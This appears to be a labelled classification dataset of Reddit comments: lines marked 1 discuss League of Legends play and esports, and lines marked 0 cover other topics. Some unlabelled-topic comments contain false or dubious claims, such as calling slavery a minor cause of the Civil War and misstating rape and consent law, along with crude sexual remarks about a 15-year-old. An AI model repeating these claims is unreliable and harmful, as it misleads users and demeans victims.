1	At the risk of sounding like an grumpy old man, I THINK THE WAY IT WAS WAS BETTER! BACK IN MY DAY blah blah.   I think the supportive style of jungle is where the true essence of the role lies. Think about, what is a jungler? When you break it down to the nitty gritty it's a champion on the map which is free to roam as he pleases where as (for the most part) the other champions on the map are constrained to the three lanes. I believe it is only natural that this champion takes on a more supportive role as it has the ability to influence all parts of the map.   I think that Riot has jammed the idea of "Carry Junglers" down our throats as a way to promote the competitive scene. For example, Meteos. Meteos carries games, BUT he carries games in a different way. He carries by farming efficient and making plays across the map which benefit his team. He doesn't carry in the manner of dealing a crap ton of damage (maybe with the exception of Kha'Zix?) he carries by playing Elise and landing a clutch Cocoon. I think that's where everything has gotten a little lost. The jungler should carry with his play making ability, not his ability to deal damage, much like Supports.   Take a look at competitive play. You rarely see any FF junglers, with the exception of maybe a Noct or Xin, because they play a more supportive role. This works because professional league is as close to a perfect theory crafted version of the game that you can get. For the most part, lanes generally go even, and if they do lose its not as drastic as you would see in an solo queue environment, making jungle interference play a larger role in the out come of any given lane.   I think there's a reason you don't see many FF junglers in competitive play right now. It's either too new or just plain not worth the effort. In a perfect game scenario, meaning all players are equal and everyone picked and no one is trolling, I think the supportive style is the most logical form of jungling.
1	There are two modes: 5v5 and 3v3; 5v5 being the dominant one (3v3 wasn't there originally and 5v5 is, in general favored).   There are three lanes that spawn minions and a jungle in between with neutral monsters.   You control a champion that has 4 spells, one of which is an ultimate that cannot be used until level 6, and a passive. Each champion (there are 81) has 4 unique spells and passives; however, despite which champion you are playing, you get 2 spells that you choose before and you can pick despite which champion you play. Ghost allows you to run fast for an amount of time, Ignite deals true damage based on your level and cuts down healing effects by 50%, Exhaust makes the target move slower and do significantly less damage, etc.   The goal of the game, ultimately, is to destroy the enemy nexus. How this is achieved is killing 1 or more inhibitors in each lane (one per lane guarded by 3 turrets, only one required to win), which allows for the turrets guarding the Nexus to be attacked and then allows for the Nexus to be destroyed.   There are a lot of other elements to the game. There are buffs (red buff  makes your auto attack deal "true damage" (ignores armor and MR, does the damage that it says), more damage per your level, and slows, blue buff gives you mana and energy regeneration and cool down reduction) that are obtained from killing the neutral monster that holds it, global objectives (killing Dragon gives each person on your team Gold,  killing Baron gives each person on your team more Gold, experience, and a buff), and more.   Each champion also has it's own unique play style and role. For example,  Annie is a burst caster meaning that she can do a lot of damage in a short amount of time but has to wait for cool downs before doing any more damage. And, since her damage is mostly from spells, she itemizes Ability Power to hit higher. Amumu is a tank who has great initiation. Ashe is an AD (attack damage) carry whose damage comes mostly from her auto attack, therefore buying AD makes her hit higher, but also benefits from crit chance, life steal, and attack speed.   In general, the game has many elements and in order to be good at the game you have to understand these elements and use the knowledge to your advantage. It's also tons of fun to play and I would definitely recommend it to anybody and everybody. It's kind of like Nexus Wars, in a way.
1	Please don't kill the messenger. League didn't make you a bad person, it made you realize you're a bad person. I hate it when people start blaming the community because you have nerd rages while playing it. EVERY online community does that, the internet is filled with all different kinds of people, ranging from all different age range and mental maturity. if you care for team comp so much, please play draft or ranked. If you don't want feeders, refer yourself to the reddit League chat and try to find people to queue with you.
1	I haven't been reported once at all and I know I flame quite a bit. Ppl tell me that "Wow you are toxic" blah blah blah and yet I have not gotten an warnings or anything. I don't do it on purpose of course but I think those who actually get a warning have really done it way more than I have or it's more justified.   My toxicity apparently when I try to tell someone that they shouldn't do this anymore. I'm not that toxic as to say go kill yourself or something dumb like that.   I think getting a reported warning after a game is actually not a good idea because ppl could just brush it off as nothing cuz ppl report in hopes of getting ppl banned and so there's lots of false accusations. However Riot should implement a system to tell you how many reports you have gotten or they should implement an approval rating system that is much better than the honor system.
1	Regi is a scrub and probably a horrible boss. However, he is the boss, and when they lose games it effects him more than the other players, due to TSM being his company.   All these people hating on Regi, for him not being a super nice guy to his employees, are most likely people who has never had a proper job and/or people who dont function too well in a work environment.   I am the headchef at a restaurant, whenever i get a new order, i tell people what to do, and when people dont do as I tell them to, something bad usually happens like guests wait longer for their food than they should. Not only is the food delayed, but it also messes with my head, cause during service i have to keep track of many things, so if one guy dont do as told, i have to make new plans and such. I feel like I can relate to Reginalds anger cause its the same situation just in a different environment.   For these reasons I fully understand why Reginald gets angry when people dont follow his calls.   English is not my main language, but I really had to try and get my point through as Ive had it with all these kids bashing on Reginald for taking care of his business.
0	No, the Constitution protects specific,  protected  classes from discrimination. Hair color is not one of these protected classes.   Hate crimes are modifiers added on to standard criminal charges, and are not in the Constitution, but in state and federal law.   Libel and slander are also not in the Constitution. Rather, courts have found that the First Amendment is not absolute, and thus individuals can be prosecuted for libel or slander (even though individuals could not normally be prosecuted for exercising their freedom of speech - since courts have found libel and slander are not protected speech) - based on state and federal laws, but not on the Constitution.   The Constitution doesn't protect people whose lives are "dramatically hindered by false allegations" because the Constitution does not deal with individuals actions, only with the action of the government.
1	Our legal systems actually have more than just a rehabilitation aspect. It splits into 4 parts: -Retribution, not only for the victim, but in fact society at large that has been harmed by the crime. -Quarantine, in order to safeguard society from the negative behavior (of course due to smurfing not really enforceable in league, but at least here they can't compete). -Deterrence, which in this case is specifically towards other pros, seeing as many of them do serve as rolemodels to many players among us. -Rehabilitation, yes, there is this aspect, but 1 year seems like a fair amount of time for this to take place, IWDominate came back after his 1 year ban.   Given these 4 factors, I think the 1 year ban they received serves all the purposes of a modern legal system, at least from a liberal western perspective, and shouldn't be cut short. Positive behavior does deserve a just desert, but this should go to those that have always acted positively, not those that were punished and based on the punishment had an improvement in their actions. Also riot needs to punish pros specifically, because many players already feel that there is preferential treatment by riot towards pros, so them taking a strong stance is good overall.
1	I still remember the first time I went to a live lol match in cologne, IEM if I recall correctly.   upon arrival I had to wait for the bathroom. I was kinda shocked that no one other than Cyanide came out (didnt expect that players and spectator shared them)   The only thing I could say was "Yo Cyanide" and he actually said "yo" back to a random guy in the bathroom 1 minute before a game.   Cool guy, have been following him ever since. I hope he comes back in some way.
1	Maokai is a very solid solo top, and is very much like Cho'Gath in that sense. He is able to farm very easily with his sapling toss and provides solid, easy CC for his team with his snare. The ulti is also very invaluable in team fights. 20% extra reduction is no joke. The only thing Cho'Gath has on him, in my opinion, is lane sustain. Maokai's passive heals him for 7%, which you can only make use of after a certain number of cast spells. Cho's heals him for about 40 hp for each creep kill.
0	While the historic view of slavery is  unsavory, the flag actually was just the flag the confederates decided to use when they seceded from the union. The civil war was never fought strictly about slavery. It was a relatively minor factor in the war. The confederates simply chose to act under what is written in the declaration of independence, if a majority of people do not approve of a governments misconduct they have the right to abolish it and begin anew. Their interpretation of this was off and secession was never the answer to the disagreements, but this was the creation of a new nation called the confederacy. So, even though the flag was created by racists, it doesn't mean it is racist in image or symbology. Much like the swastika(sp?) was originally a symbol of peace and balance, yet many people still personify it as a racist symbol.
1	you put a tanky lane bottom....something that can just dominate a couple of squishies...something like blitz/alistar....blitz and alistar dont rely on farm as much as the enemy carry does, they can force fights early and disrupt the farming phase...even if they dont get a kill, as slong as they keep cs low, they are ahead...they are very immune to ganks due to large amounts off cc while making their junglers ganks much more potent   the problem here is it leaves a squishy vs jarvan/irelia/SQUISHY KILLERS   this is why i like vayne...she is generally terrible in lane, but vs someone who cant touch her, someone that will get knocked back and kited everytime they try to jump on her, she becomes very strong and snowballs hard   i also like champs with amazing harass and escapes, such as corki and caitlyn...this si generally where your weak, but having a champ like caitlyn who can dominate pretty much everyone and is very untouchable really balances out your lanes   you keep ap carry mid, there was never much of a problem there   now, the eu style composition nearly requires them to have a tank jungler, or at least a jungler with a great initiate   this means they must use, amumu, ww, malphite, rammus, shen...mostly weaker junglers with the exception of ww and amumu   on the other hand, this style would allow any range of junglers, sometihng like amumu or ww would still work, while getting an anti-carry like nocturne or olaf also seems very strong...in fact, by banning tanky junglers, you would be nearly crippling the enemy team in terms of what they are capable of doing   now yes, top lane somewhat functions as a tank/initiate, but until they farm up that tri-force, they are fairly vunerable, and  their initiates compared to a true tank are fairly useless...comparing a tank like malphite or amum who can lock down a whole team, irelia/jarvan will jump on someone and just get knocked away by blitz/alistar and the intiate becomes a wipe
0	Look up the term "monopsony." On mobile, so I'm just going to link [this](  and say
1	Well, I am not the one who wrote the article. i am just giving you a very concentrated
0	On the site itself, No watermark is shown. But if you share it on Facebook or something in that order, the watermark sticks like chewing gum on s shoe; You don't want it there and it takes time (not much, tough,) to take it off.
0	The biggest problem isn't even that university costs are too high, though that is an issue. Wages are the problem. I would highly recommend watching the documentary "Inequality for All" for more information. One of the points that it emphasizes is that average wages have not kept up with the cost of living. The wealth of America has increased quite linearly since WWII, and for a time the wages followed an almost identical trend. In 1972, however, the wages of the average worker flattened- actually dipped! At the same time the GDP continued to grow rapidly. What does that mean? The cost of living increases, both adult members of the household work to sustain themselves, they work longer hours, and take out more debt. All of that make living harder, and higher education for most impractical without crippling student loans.
0	No, it's not acceptable, it's not just "That's life", it's total BS and it sucks. I've been through long periods of unemployment - I was lucky enough to have a lot of money saved from previous employments so I never took government checks, nor were they four-year gaps, so it's not the same experience.   No one of those elements is enough to explain four years of failed job hunting. I don't know how many of my points apply to OP - obviously female, educated, and employment gap - but start putting them together and... well, you can see where this is going. I also didn't add "Lack of job-relevant experience", which I also can't speak of for OP since I don't know her job history.   You can believe it or not but the simple fact of the matter is that a good-looking young white male is simply more employable than anyone else in America, all other qualifications being the same. That's not to say that managers see a name like "Carlos" or "Kwame" and immediately reject the application. It's a lot more complicated than that, and a lot of it might happen without the hiring manager even knowing why they are doing what they are doing. Having either one of these drawbacks may prevent a manager from hiring you more than you might think.   I guess my point here is that a lot of little things can add up to make employment more elusive, particularly in times of general economic hardship. I could rattle off and qualify more factors - age, previous jobs, competition, personal emotional factors (OP did mention she went through a period of depression where she gave up on getting a job - shit, I would too if I had it that rough. I can only hope I never do)... but odds are few of these factors affect the general population of Reddit and so they are in effect "invisible". It doesn't affect you so it can't be a thing? Besides, I got a job in one week! And my boss is an asian woman, so those two aspects can't be that big of a factor, right? Right? Well shit, how long as Ms. Asian Lady Boss been in that position? How long did it take her to get there? And are you lucky enough to be in a liberal multi-cultural college town where that sort of thing is more likely?
1	Nautilus's kit actually scales pretty well with AS. Level 5 titan's wrath applies 130 AOE magic damage over 2 seconds on-hit. I believe the damage is applied in 2 or 3 ticks, where the 1st tick occurs as the auto-attack hits, and the subsequent tick(s) occurs over the next 2 seconds.   So assuming the damage occurs in 2 ticks (I'm not sure on this), Nautilus basically does 65 AOE on-hit magic damage with each tick. Each time Nautilus hits his target, the 1st tick of Titan's Wrath is applied, so you get slightly more than 1.5x a Wit's End bonus damage in an area of effect with each hit.
0	I was 14. It was winter time and a few kids from school were hanging out one night. A cute girl and I broke off from the rest, and we ended up laying down on the snow.   I don't know how it ended up with her resting her head on my ass, but it did. I silently farted, and in my effort to not have her smell what just happened, I suggested we get up and rejoin the group. I always thought she knew what had happened, and nothing ever developed between the girl and I.
1	Time scale to dodge. I mean, I see so many people get hit by spears because they either walk into them or try and dodge and instead of just stopping, they again run into it. Yes, at times when it's coming from jungle it's impossible but it's about reactions when you can fully see it and either stop or run to the side and not let it chase. (I know at times this is also unacceptable.
1	They won the noct game tho, your
0	Exactly. I grew up around an Air Force base and a fair amount of dudes I ended up knowing rode Bikes. The worst accidents I heard of involved alcohol, either the Bikers being drunk or other drivers being intoxicated (the latter often being the case). Fatalities are common, but are often a result of improper protection.   I actually know a guy who got T-boned by a dick who blew a stop sign in a residential neighborhood while riding home for Thanksgiving. He was tossed off his Bike and slid straight into the curb, and despite fracturing a Cervical vertebrae he came away relatively unscathed. Luckily, he was wearing the proper protection i.e a fitting helmet. If he was riding without one the force of being flown from his bike at 30 mph would result in him getting his brains splattered against the curb.
1	Okay, I'm a 30 year old man working in the sales department of a big company and I just want to say: Welcome to free market economy. Never trust anyone!   Big companies, despite the positive reputation they might have built up, are going for profit. There is no point of running a company of this size if you're not interested in increasing turnover. And profits need straight business plans including good PR.   My point is that Riot "tricked" him because they wanted full control over how the story was going to be delivered. If Riot comes up first with publishing the news they can decide in which direction the whole thing develops. Lewis could have written something like "MILLER AND SMITH FIRED!" or "ESL POACHED MILLER AND DEMAN". You see the difference?
0	OP, your point is well taken, and I think you're touching on something that fundamentally differentiates American football from association football (which I will henceforth refer as "soccer" in order to avoid confusion).  Soccer fans seem to be much more inclined to accept the theatrics of the sport: bad calls, missed calls, dives, etc.  Deception, at times, is part of the game, and, frankly, it's often rewarded.   American football fans have zero tolerance for this.  Fans expect absolute truth and impartiality when it comes to officiating.  It's part of the reason the sport has such and extensive review and challenge process.  This is not to say there isn't genuine outrage over bad calls that are made in soccer.  Of course there is.  But the sport has opted not to implement replays and reviews for a variety of reasons, and in doing so there's a sense of tacit acceptance of the status quo.   This mentality might be part of the reason that soccer hasn't completely caught on in the States at the professional level like it has in other parts of the world.  I really like soccer, but I'm genuinely turned off every time I see someone take a dive or fake an injury to run down the clock (the latter occasionally happens in American football, but not nearly to the extent that it does in soccer).  I recognize that this sentiment isn't unique to Americans, but I think it irks us more than others.  Americans get acquainted with soccer theatrics every four years, and it tends to leave a poor taste in our mouths.  In fact, Nike even ran [a pro-U.S. ad back in 2010]( thanking the American team for not resorting to diving.
0	Whilst tipping in general will never hold up in court on its own, the right tip can point police in the right direction if they couldn't possibly know something: i.e. Guy A just robbed Guy B, then Guy A turns up dead and Guy B is laying low.   It's unlikely that the person who was robbed will report it to the police if a snitches get stitches mentality is the norm, but now the police have a line of inquiry, and as people are inherently dumb, the right guy in front of the police will quite often end in an arrest out of sheer stupidity on the criminals part.
0	This required at least a small amount of creativity & thought. Confession Bear only requires you to type something absolutely everyone does, in a way that makes it sound condemnable.   The effort to karma ratio makes Karate Kyle and similar memes unworthy of lazy Redditors' investment.   Example:   Sometimes I fart before I get in the car + picture of sad bear = thousands of karma for no thought whatsoever.   She threw out my valentines card. I threw out her back = 13 karma tops, for a whole shit's worth of thinking time. I know it's not funny, but I'm not funny. I'm just a guy who over analyses things and posts it on the internet.
1	I started bronze too this season and it took me a month to get from S1 to G5 and reason why you get so little LP is because once you hit G5 you can never lose it so the system is design to make sure you diverse G5 so they don't give you much.  some people stuck at division 1 at 99 LP and gain 0 LP per win because the system think that they are not skilled to go to the next tear.
0	Well societal law says a lot of stupid, nonsensical shit that doesn't/shouldn't apply to real world situations. For example, it's illegal for me to fuck a girl who is 15, a week away from her birthday. The week after, I can impregnate her every week and high five her dad, show him my dick, and let him know I put it in his daughter every day, because she's of consenting age. (Yes I know this varies state to state).   It's insane how a 12 year old boy can show a picture of his dick to his girlfriend, and have his whole life destroyed for "distribution of child pornography."   It's baffling that 12 year olds must adhere to the same abortion laws as adults.   It confuses me as to why women who fake rape aren't given extraordinarily severe punishments, since they ruin the lives of their accused while simultaneously making it harder for real rape victims to find justice..   It's weird how a woman can simply say "no" at any time during intercourse and have it count as rape, while a man can say no and it's considered hilarious.   It's disgusting how, in California, there is a law that allows for a man to rape a woman if she consents to it thinking he is someone else, and then later realizes her error and freaks out. Oh, wait, this is  illegal  as long as the woman is married. If she is unmarried, she is fair game in the world of rape.   That brings me to my last point: Marriage law. It's fucking stupid and makes zero sense. I have a girlfriend? I decide to rape and murder 400 children? Cool, she can testify and put me away. We're married? Her testimony doesn't count. WAT.
1	I feel like FNC became overly cautious after that horrible early tower dive. But later they played so well again, awesome.
1	Okay, so let me guess: your lastpick had to support even if he doesnt want to. or didnt say anything. Why not. There is no "there must be a support in every Team"-rule. And then ingame you continue to always say he has to supüport, should stop taking cs. Why do you want to tell him how he has to play?   No reason to leave but believe me: there are different tactics that work. And there is no rule that anyone has to play something he doesnt want. And you can't stop someone taking cs or is your name on it?
1	Hello Reddit,   I'm a relatively low-elo player (Silver III), and I started playing lol just a month before s3 ended. I absolutely loved the game and tried to get better doing stuff like watching streamers and learning their build/jungle paths, laning phase and little champ-specific mechanics. I really got better in time doing this and practicing CSing in custom games. And was placed bronze 1 pre-season 4. Now my question is I was able to climb the ladder with my current skills, and I happened to win %70 of my games (even though I never REALLY carried one) and climb relatively faster. But these few weeks has been hell for me. It seems really hard to win games now, I have like a 1/10 losing streak and that one win I ended up with a score like 1/8/2. I don't know what happened and I don't really see a difference in my playstyle, I got demoted yesterday and today i sit at 25lp Silver 4. What should I do differently?
0	If you're judging a woman based on how inferior you consider her taste in men to be, then you aren't a "Nice guy." You're faking it to get attention from women. Don't get mad at them when they see through it. If you keep being a "Nice Guy" and parroting what you think she want's to hear, she's going to do the same thing to you. And when she's super "Nice Girl" to you and yet never dates you, you better not come back here talking about how disingenuous women are. That's hypocritical.   Get confident, get clean (Appearance matters. And even if you're fat and unwieldy, at least be fat and presentable) and stop treating kindness like a currency. Most women don't give a shit if you want THEM because the women you're chasing try to take care of themselves. They are only interested in the men THEY are attracted to. If you can't put the effort in to be more appealing than "Assholes", you're just being a self deluding, self righteous ponce.
0	The reason we started this policy is simple. An employeee comes to me requesting a pay rise. I evaluate how that employee has been going, how productive he has been, how well he has been been completing all the paperwork that is part of his job and decide if I will give him a pay rise and how much. I base this decision based purely on the individual's performance. Previously this decision has also needed to take into account everyone else in the work place of the same pay grade because as soon as 1 person gets a pay rise everyone else thinks they should get the same.  I would prefer to reward the few individuals that stand out and really help to keep us in business rather then the majority that are here just to get their weekly pay check and do the minimum required.  I have made it perfectly clear to every employee that they can come and see me anytime to get their wages reviewed and I will do the best I can to provide real feedback to why they do or do not get a pay rise and what is required of them moving on towards their next pay rise. We have people in our workshop that are paid well above what other people with the same qualifications are getting paid based purely on their performance. If we paid everyone at the same rate without their performance increasing to where it needs to be we will be out of business very quickly.
1	Why are there so many pissy children complaining about "oh I dont like his videos,  WHY DO YOU LIKE THEM YOU MUST BE STUPID" its a video, for fun, for entertainment. Stop being mad about something that has no effect on anything.
1	Not an entirely new concept, there's been a few variations. I had a very successful, similar game a while ago. Went out with just one buddy in some duo's. Had one game where everybody was already "im playing X in Y lane or else I AFK" type bull. After I picked and locked, I eventually got shunted into top with morde because one wanted mid and the other two insisted they play together (ashe and WW, wtf?). I was panth. I was not set up as a jungler, so couldn't outright jungle. I also did not want to screw up morde's CS and experience by staying in his lane though. Instead I went as a counter jungle. Lvl 1 I went for the opposing jungler, who must have thought he was getting it easy since we had no jungle. Got him and the mid that was leashing for him (Our ahri in mid got a last second hit with her ball for the assist). From this point I went into roaming mode. I popped into lanes when needed, but otherwise just made my job to shut down their jungler. Since we already had his blue, he couldn't start his jungle out right and ended up finishing the game at lvl 12 (everybody else was 18). Once I was 3-4, I jungled a little in between ganks to keep up my level. Was outright brutal. I have been debating on trying out a permanent roaming panth build, haven't gotten around to it though.
1	thing about it is, you can get catalyst for extra mana/health/laning presence then go rylais   even though it is statistically inferior, i have never been in a situation where i wished i had the 300 hp it has since he naturally has tons of hp...the mana is nice, but ive never had mana problems on him once i get catalyst   also the catalyst can be made into banshees veil instead, which is, many times, needed on singed to keep him from being kited by knockbacks and such as he tries to run in   alos the glue is fairly unreliable...dont get me wrong, its a fuckign strong as slow and is amazing but you have to remember singed role...he often times is the one bull rushing enemy carries and throwing them into your team or chasing them out of the fight and most of the time you have to use your super op slow to chase down the carry   you end up with a scenario where you are limited in team fight presence to either where you either have to stick with your carries and protect them or chase down their carries, youc ant really do both....but with rylais, you slow everything behind you, making it near impossible for the enemy to initiate onto your team, you can throw your goo into their team making it easier for you to initiate on their carries, and overallyour presence in team fights is just larger
1	They have fun on their streams 14 hours a day, where they can do whatever they want.  They are in the finals of a major tournament that many teams were dying to get into, and they make a mockery of it by showing that they don't care at all.  They have plenty of fun all of the time.
0	Clearly you've never been in that situation - it's easy to say that when you've never actually had to DO it. And even still.. if you're able to do that, awesome. But most people struggle and I don't see the point in making their life harder.   Being overweight is really crap - it pretty much changes ever aspect of your life for the worse. And it's depressing.. man is it depressing. Oh and you know what an awesome temporary way to feel better is? Eat some nice foo-- aw fuck.   And while it's easy to put it on.. wow is it a slow process to get it off. So you have to do all the work for a long time while still being a fat person. AWESOME. Or not. The process does give some natural highs for sure as you start to see results, but remember you have that whole other 'life' thing going on.. so every time something crappy happens you don't have the vice you used to - ie, eating, because if you start again you might not stop..   Oh let's not forget people! You wouldn't think the same people who laugh at fat people would constantly be trying to shove food and drink down their throats would you? Well they do. It is amazing how much it matters to other people what you eat... and with everyone around you is saying "Oh go on, just one slice", or "It's just a few beers, no big deal man" it can be seriously hard to say no. These people are the biggest hurdle to get over. They want you to go out for dinner and drinks, come over for a beer, have a pizza, go to a BBQ.. and they always seem to take offence when you either decline because you don't want the temptation or if you show up but don't eat. You can't win.   The bottom line is there is nothing fun about being fat and there is nothing fun about losing weight. Once it's gone - that's awesome! But that road can be incredibly difficult to go down and as I said above.. I just don't see how making life even more difficult for those who are actually trying to change is helping anything.
1	Hello kind sir,   Thank you for your very detailed post. Now I am going to tell you something you and many other lower tier players are going to disagree with...  You are where you belong.   Now I know this might come as a shock, but if you're "easily" holding your own against silver/gold player then over time, that is where you should be.   I myself was placed in Bronze 3 this season, "a laughable tier for someone like me" I thought. After 2 weeks of playing nearly 80 or so games I had climbed to the prestigious Gold V.   Also, your preferred system of individual LP gain is totally and utterly ridiculous, this is a team game, ever played in a team based environment? If one player messes up, you all get punished. If everyone got individual LP on KDR, players wouldn't play as a team, people would steal kills, then people would argue over stealing kills, and the flaming continues.   By the way, your presumption that Junglers and Supports cannot carry the game is false. Junglers actually have the highest potential to carry the game. You control the lanes, the buffs, the dragons, the barons, the towers AND the wards. You get to decide which lane you want to feed/camp/control.   As support you do a tremendous amount of carrying, it may not seem like it and your assumption is normal, you control the pace of the game. Vision = win as they say. The support can make clutch plays to engage or save a teammate, a support goes out with the oracles and destroys the enemies vision, the support times buffs and objectives and keeps an eye on the map to warn other teammates about the incoming ganks.
1	This actually kind of happened to me today. We had a hecarim jungle that actually carried our team through early and mid game. Seeing how as our tank jungler was carrying us, we lost every lane (despite getting at least one kill every time he ganked). Anyways, I was playing support (solo queue) with ez adc. We were lanning against a varus/taric. I think we ended the lane around 7-4 in their favor (so I guess 4-7). Hec ganked twice and left us alone the rest of lanning because our top lane was getting killed, literally. It was a jax (our team) against a Garen so naturally Garen has the upper hand. Had Hec not left my lane alone Garen would have snowballed so far out of control that we may have actually lost the game. (if you couldn't tell, we won the game). I'm willing to put money on it that had Hec not helped shut down Garen the game would have gone in a completely different direction.
1	It seems for you that you are doing bad, because subconsciously you have a high standard for yourself. So even if you are doing good, you can still think you are doing bad. It's like people who think that everyone hates them, even though no one even cares.
1	I hit 900+ ping last Wednesday with only League open. Needless to say, it was unplayable. I left the game and out of curiosity opened Heroes of the Storm. Played a 30 minute match with no issues. Haven't played League since, haven't had lag problems since.
1	Because it is Zed and Talon. 2 burst mid lane AD Caster/Assassins.   Winrate doesnt mean everything, when will people learn that? Zed is commonly seen as the better talon. Talon has a 4.74% pick rate and a 0.55% banrate. Zed has a 13.19% pickrate and a 38.38% banrate.   The only people that really play Talon now a days are the people who are really good at him and main him despite his e nerf. Therefore he has a suspiciously high winrate because most people who don't play Talon OR Zed are more likely to pick Zed over Talon which for one brings down zed's winrate falsely and brings up Talon's winrate the same.   Zed's closest comparisons are LB and Talon. Talon because he is an all in AD caster mid laner, and LB because she has dashes that let her swap back to start and spells that do more damage with proper comboing and procs.   In this case you want a reason to pick Zed, so becasue he is AD and can splitpush well. Talon also has these same benefits, thus why I am comparing him to talon.   The big reason to pick Zed over Talon is the safety. You STILL have that reason even if you have to fight for 1 second after you ult. It is better to have a free escape after 1 second then none at all.   The "very different situation" is that Talon got gutted and his identity as an Anti Mage removed with no compensation where as Zed is overtuned, highly banned, highly picked, and trying to be toned down without gutting him like they did Talon.   If they removed his ability to go back to the Ult shadow entirely that would take out the reason to pick him over talon, that would kill his identity, very much like taking Talon's Silence.   Be grateful that it has only come to this and not further.
0	Thanks asshole you're only 5 years late. Smh why didn't you fax this to me years ago?   24 years old   6 grand in debt   Not great credit, some borrowers will lend money.
1	Hey first off I'd like to say that I think this is really awesome and a great way to grow the eSports community. I think that it has one major flaw though. You're missing out on a major demographic of the game. Alot of people who play are under 21. I would have gladly paid double or triple to show up and watch worlds with you guys, but I couldn't because of the age restrictions. Maybe next time you could do some sort of event for people under 21 who want to show up and have good time because we make up a large portion of your fan base.
0	Take it from a guy who's mom and stepdad would routinely have lobster and other fancy meals while us kids got store-brand mac-and-cheese (Kraft was "too expensive"), this shit hurts. I don't give a fuck who's making the dinner. I would have made it myself! Was I a bratty teen-ager? I'd like to think that I was just hurt by the fact that some jerk she met two years prior (and who beat her, no less) got better food then her own children on a regular basis.   What does this have to do with the OP? Stop assuming that the kid described is acting entitled. Maybe he's sick of chicken nuggets after having had them for nights on end while his mother buys her expensive cookies every day. Maybe he could have gotten pizza pockets if his mom got the Keeblers that day. Maybe he feels like he's burdening his parents because of all this, and his friend is submitting this so that he can show him the comments and through them how his mother's behavior isn't right.   Life as a kid isn't all fun and games. I would never return, not even if I could somehow game it to my advantage. Having to rely on someone I didn't quite trust for everything was a nightmare! God, and especially so when other adults used to bitch me out for being ungrateful. I didn't even know what I was supposed to be grateful  for ! The lectures and endless ridicule? The constant punishment for thoughts I never articulated (including my all-time favorite "you think you know more then me, don't you. Well fine, you're grounded")? The knowledge that my siblings would take the heat if I wasn't there to soak it up for them? How is asking for  Kraft  when they got  lobster  and  prime rib  being spoiled? How retarded was my angst and depression? At least now when I buy crappy food I don't have to deal with people telling me how awful I am because I'd prefer to be eating stuff that tasted better.   All that said, you're right. Maybe I should have just been grateful that she was the one cooking the mac-and-cheese that night, despite the smell of seafood from down the hall... aha, yeah, right. Rest assured that I've forgiven my mother... but I'll be damned if I ever forget. Remember this if you're a parent. I mean, at least don't let your kids know about how you're enjoying your food while they aren't.
0	I tried POF but deleted my account after having no messages returned (whereas on OKC I was doing just fine). Then as an experiment I made two fake guy profiles, one being a Doctor, the other being a recently released convict. The Doctor got one message back, the excon got 30.
1	It is nice to see that you took a lot of the criticism people gave you and actually worked to improve at if. I couldn't stand you in some of your videos when you were against gold players and outplayed them on riven and would basically fall of your chair screaming at the top of your lungs because you just beat up a little league player. Now I really can enjoy you as a person and a player much more because of your attitude you have matured a lot as a streamer and a league player I love it .
0	Former satellite-service customer service (retention) agent here.   If the cable companies were anything like us (they probably were)...  We were  required  to say anything and everything we were capable of saying to keep the account.  If they were doing their job, they would've qualified the extra dollars with something that the other service didn't provide.  Better quality, connection, customer service, packages that you'd like better, etc.  They'd be hard-selling you until the last possible minute or until you ask for a supervisor.  I've even had old co-workers look at the setup of their account, and if they had bad credit during the account set-up, they'd use that.  "Why would you move to a different company when you'd just have to spend money on deposits all over again?"  Customer retention was key.
0	Because it's essentially not possible to field a national candidate without a strong local base throughout the country, and well before you reached the level required for the presidency you'd have started to pick up governorships, state Senate or house seats, and for that matter federal congressional seats. A party that has none of these is almost certain to also not have a plurality of the popular vote. You are simply never going to see a libertarian or green or any other third party President until you start seeing a whole bunch of local, state, and congressional winners from that party.
0	There is no law requiring people to have a photo ID, so by forcing people to get one to vote can stop those who are poor from voting.  Since the US already has really low voter turnout, it is counterintuitive to shrink the population who can vote further seems counter to what a representative democracy should strive for.  And since businesses are not required to give you time off to vote, reducing early voting also targets the working poor in an attempt to further reduce those able to vote.
0	My brother told me this joke when I was in 7th grade. I did not understand it at all. As time passed I grew older and one day that joke popped in my head. Sadly I never had it correct because I still didn't understand it. Then one day (today after 15 years) I see this joke..  And I can finally but my mind at ease because in my age I finally understand it.
0	Since no one has said this, time for me to chirp in. I've noticed something of a trend for universities. Those who have to work hard in high school (and generally get a lower gpa because of it) but get the time management and study skills from high school tend to do much better at University. Conversely, those that do good without trying tend to not do as well and have issues with the freedom and time management that goes along with the environment. Mind you there are exceptions (or outliers sorry I'm in a field with a lot of statistics), but it seems to be the general trend. And now I would want to see the data on that...   Edit: I looked up a paper that looked at test scores as well as high school GPA. They say that high school GPA has more to do with placement that testing. They found rather low levels of correlation for the testing compared to the high school GPA (R2 ranging from 0.02 to 0.25 for testing compared to about 0.35 for GPA. Not great but okay R2 values)   For performance, they showed a 0.6 drop in GPA between HS and College. However, only ~20% of the variation in GPA.   Source:
1	Buying items that only give worthwhile stats by getting absurdly ahead whilst also causing you to loose 1/3 of those stats from a SINGLE death.   [Sidenote] Mejai's is insanely common for mid laners to use in the Chinese meta.
0	It's an idiotic comparison.  If he was in a video game tournament I wouldn't pull him out to take out the trash either.  If he was in a ballet performance I wouldn't pull him out to take out the trash.  These are scheduled things.  If he were in the backyard tossing around the football when it's dinner time, I will call him the fuck in because it's dinner time.  If he leaves the table to play a video game before clearing his plate I will call him away to clean it up.
0	Dude(ette?), I know that feel. I peed my pants when I laughed to hard up until 10th grade. TENTH FUCKING GRADE. Shit was horrible. It's hilarious now but it was traumatizing then. I was a little goodie two shoes so I didn't like lying but I also didn't want to admit that I pissed my pants. I discovered that if I went to the water fountain and kept drinking, eventually my stomach would hurt and I could go to the office and ask to go home by holding my stomach (I've heard all the "oh that's probably why" jokes so shut it!). They probably thought I had some weird stomach issue. My parents always knew and were totally cool with picking me up when it happened.   My other strategy was to wear reallllllly huge shirts, way too big for me, all the time, because I could pull them down far enough to cover my pissed pants for temporary relief of embarrassment. I once pissed my pants at a karate lock in so I couldn't leave so my parents brought me extra clothes. God, when I remember this shit I realize how horrible it was at the time.
1	So basically every Champion who ignores unit collision can walk through his Ultimate   i just tried that with a friend of mine, once hecarim with and without PD (that way i wouldnt waste my time, since you can apply pd's UC-ignore to everyone). he couldnt move through the ult
